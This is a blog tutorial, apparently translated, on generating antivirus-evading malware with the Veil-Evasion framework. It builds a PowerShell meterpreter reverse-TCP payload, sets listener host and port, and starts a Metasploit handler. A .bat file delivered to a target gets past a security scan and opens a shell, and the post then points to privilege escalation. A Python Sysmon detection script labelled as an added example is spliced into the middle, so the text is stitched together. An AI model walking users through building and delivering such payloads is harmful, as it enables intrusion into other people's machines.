Touch The Technology


Bypass Antiviruses with Veil Framework

During pentesting, the target machine or machines may be protected by antivirus software. You’d have to bypass this software and open a shell. The tool for this kind of job lives under the Veil roof and is called veil-evasion. Tools like this bypass antiviruses with different encoding methods.


git clone veil
cd veil/setup
After the setup, run the “” file under the veil directory.
On the screen above, you can see that there are 51 payloads available. For the payload list you should use the command below.

As you can see above, there are payloads available to build with the C, C#, Go, Python, Ruby and PowerShell programming languages. We’ll choose the 24th payload. Just like in Metasploit, you can either type “use Payload_Name” or just type the number of the payload.

[menu>>]: use powershell/meterpreter/rev_tcp
[menu>>]: use 24

We chose the payload. Now we enter the IP and port information using the “set” command.

 [powershell/meterpreter/rev_tcp>>]: set LHOST
 [powershell/meterpreter/rev_tcp>>]: set LPORT 54321

After we enter the IP and port information, we can get more information about the payload by typing the “info” command.

After we fill in the required fields, we create the malware by typing the “generate” command.

 [powershell/meterpreter/rev_tcp>>]: generate

As you can see on the screen, it asks us for the name of the output file. The default name is “payload”.

The malware is under the “/usr/share/veil-output/source/” directory, and it comes with an msf script if we want to make our job easier. The msf script is under the “/usr/share/veil-output/handlers/” directory.

To use it:

 root@ruger:~# msfconsole -r handler_name.rc

Time to test it!

When we send the malware to the target, it starts a security scan, as you can see.

(The text on the bottom of the window is in Turkish. It says “running security scan”)

But it can’t detect the malware. Hooray 😀

(Text on the bottom of the window says “kotuyumbenkotuyum.bat has been downloaded successfully.”)

When we run the malware, it connects right away.

And we’re in!
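The file scan missed the .bat, so on the defending side this has to be caught by behaviour. The following is an added example, not part of the original post or of Veil: it correlates Sysmon process-creation (Event ID 1) and network-connection (Event ID 3) records to flag PowerShell that a batch file started and that then connects out to an unexpected port. It assumes the batch file starts powershell.exe as a child of cmd.exe; the event values, the `EXPECTED_PORTS` allow-list and the function names are made up for the illustration.

```python
import re

# Constructed Sysmon-style events (ID 1 = process create, ID 3 = network
# connect). GUIDs, paths and addresses are invented for this example.
BAT = r'cmd.exe /c "C:\Users\lab\Downloads\kotuyumbenkotuyum.bat"'
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"EventID": 1, "ProcessGuid": "{demo-1}", "Image": PS,
     "ParentImage": r"C:\Windows\System32\cmd.exe", "ParentCommandLine": BAT},
    {"EventID": 3, "ProcessGuid": "{demo-1}", "Initiated": True,
     "DestinationIp": "203.0.113.10", "DestinationPort": 54321},
    # Interactive PowerShell started from Explorer: not script-spawned.
    {"EventID": 1, "ProcessGuid": "{demo-2}", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe"},
    {"EventID": 3, "ProcessGuid": "{demo-2}", "Initiated": True,
     "DestinationIp": "203.0.113.20", "DestinationPort": 8080},
]

SCRIPT_RE = re.compile(r"\.(bat|cmd)\b", re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
EXPECTED_PORTS = {80, 443}  # assumption: ports this host normally talks out on

def exe_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def script_spawned_callbacks(events, expected_ports=EXPECTED_PORTS):
    """Return alerts for PowerShell started by a batch file that then
    opens an outbound connection to an unexpected port."""
    suspects = {}  # ProcessGuid -> command line of the launching cmd.exe
    alerts = []
    for ev in events:
        guid = ev["ProcessGuid"]  # stable key; raw PIDs get reused
        if ev["EventID"] == 1:
            if (exe_name(ev["Image"]) in POWERSHELL
                    and exe_name(ev["ParentImage"]) == "cmd.exe"
                    and SCRIPT_RE.search(ev["ParentCommandLine"])):
                suspects[guid] = ev["ParentCommandLine"]
        elif ev["EventID"] == 3 and ev["Initiated"] and guid in suspects:
            if ev["DestinationPort"] not in expected_ports:
                alerts.append({"launcher": suspects[guid],
                               "dest": (ev["DestinationIp"], ev["DestinationPort"])})
    return alerts

if __name__ == "__main__":
    for alert in script_spawned_callbacks(EVENTS):
        print("ALERT", alert)
```

The port allow-list is the weaker half of this rule; where batch files do not normally start PowerShell, the parent/child pairing is worth alerting on by itself.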

What comes after this part is limited to your imagination. The next thing to do is escalating your privileges on the target device 😉



Melisa Ayşe Demirel | Author - Translator